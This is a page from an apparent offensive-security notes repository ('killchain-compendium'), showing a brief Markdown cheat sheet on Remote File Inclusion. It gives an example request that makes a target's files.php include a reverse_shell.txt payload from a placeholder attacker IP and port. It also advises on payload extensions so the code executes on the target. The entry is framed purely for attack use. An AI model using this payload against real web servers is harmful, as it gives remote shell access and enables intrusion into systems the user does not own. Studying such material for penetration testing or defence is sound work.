whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Exploits/Web/Remote File Inclusion.md

10 lines
317 B
Markdown
Raw Blame History

# Remote File Inclusion
## Usage
* Use a GET query parameter to include an attacker URL.
```sh
https://test.com/files.php?file=http://<attacker-IP>:<attacker-Port>/reverse_shell.txt
```
* Payload may be PHP for example, but should not end in executable file extensions. The payload is executed locally, otherwise.
Reference in New Issue View Git Blame Copy Permalink